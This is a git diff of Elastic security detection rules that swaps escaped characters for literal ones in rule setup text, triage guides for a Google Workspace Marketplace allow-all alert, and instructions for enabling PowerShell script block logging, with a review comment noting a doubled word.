- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_105.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_105.json
index ce176504e58..48c6253415c 100644
--- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_105.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_106.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_106.json
index 95117539d8c..6b2107fec8d 100644
--- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_106.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_107.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_107.json
index 57f9d874a5b..2b00e85fe15 100644
--- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_107.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_104.json
index a632baf4200..7a1bd13bdf1 100644
--- a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_104.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_105.json
index 100399ad492..2db52f3c812 100644
--- a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_105.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Restrictions for Google Marketplace Modified to Allow Any App", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Restrictions for Google Marketplace Modified to Allow Any App\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule identifies when the global allow-all setting is enabled for Google Workspace Marketplace applications.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- Search for `event.action` is `ADD_APPLICATION` to identify applications installed after these changes were made.\n - The `google_workspace.admin.application.name` field will help identify what applications were added.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate 
organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Google Workspace administrators may intentionally add an application from the marketplace based on organizational needs.\n - Follow up with the user who added the application to ensure this was intended.\n- Verify the application identified has been assessed thoroughly by an administrator.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Restrictions for Google Marketplace Modified to Allow Any App\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. 
Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule identifies when the global allow-all setting is enabled for Google Workspace Marketplace applications.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- Search for `event.action` is `ADD_APPLICATION` to identify applications installed after these changes were made.\n - The `google_workspace.admin.application.name` field will help identify what applications were added.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Google Workspace administrators may intentionally add an application from the marketplace based on organizational needs.\n - Follow up with the user who added the application to ensure this was intended.\n- Verify the application identified has been 
assessed thoroughly by an administrator.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the 
interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CHANGE_APPLICATION_SETTING\" and event.category:(iam or configuration)\n and google_workspace.event.type:\"APPLICATION_SETTINGS\" and google_workspace.admin.application.name:\"Google Workspace Marketplace\"\n and google_workspace.admin.setting.name:\"Apps Access Setting Allowlist access\" and google_workspace.admin.new_value:\"ALLOW_ALL\"\n", "references": [ "https://support.google.com/a/answer/6089179?hl=en" @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_106.json index 3ae589e33e4..5dd4257388b 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a2795334-2499-11ed-9e1a-f661ea17fbce_106.json 
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Restrictions for Google Marketplace Modified to Allow Any App", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Restrictions for Google Marketplace Modified to Allow Any App\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule identifies when the global allow-all setting is enabled for Google Workspace Marketplace applications.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- Search for `event.action` is `ADD_APPLICATION` to identify applications installed after these changes were made.\n - The `google_workspace.admin.application.name` field will help identify what applications were added.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate 
organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Google Workspace administrators may intentionally add an application from the marketplace based on organizational needs.\n - Follow up with the user who added the application to ensure this was intended.\n- Verify the application identified has been assessed thoroughly by an administrator.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Restrictions for Google Marketplace Modified to Allow Any App\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. 
Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule identifies when the global allow-all setting is enabled for Google Workspace Marketplace applications.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- Search for `event.action` is `ADD_APPLICATION` to identify applications installed after these changes were made.\n - The `google_workspace.admin.application.name` field will help identify what applications were added.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Google Workspace administrators may intentionally add an application from the marketplace based on organizational needs.\n - Follow up with the user who added the application to ensure this was intended.\n- Verify the application identified has been 
assessed thoroughly by an administrator.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the 
interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CHANGE_APPLICATION_SETTING\" and event.category:(iam or configuration)\n and google_workspace.event.type:\"APPLICATION_SETTINGS\" and google_workspace.admin.application.name:\"Google Workspace Marketplace\"\n and google_workspace.admin.setting.name:\"Apps Access Setting Allowlist access\" and google_workspace.admin.new_value:\"ALLOW_ALL\"\n", "references": [ "https://support.google.com/a/answer/6089179?hl=en" @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_2.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_2.json index cb663a93885..778fb86a932 100644 --- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_2.json 
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_3.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_3.json
index c10b10d862d..52a664dc2ed 100644
--- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_3.json
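Review bot: The new-side `setup` text still carries a doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; the commit only swaps `\u003e` for `>` in that string. The same sentence appears in the `_3`, `_4`, `_5` and `_6` versions of this rule in the four file sections that follow. If these versioned rule files are frozen snapshots, the correction belongs in the upstream rule source so the next published version reads `Steps to implement the logging policy with Advanced Audit Configuration:`.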
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_4.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_4.json
index fc9abb0d191..e5e0095523a 100644
--- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_4.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_5.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_5.json
index 64b2ba2e995..f190471f99a 100644
--- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_5.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_6.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_6.json
index 5c08a273800..7414a5c2480 100644
--- a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_6.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a",
- "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
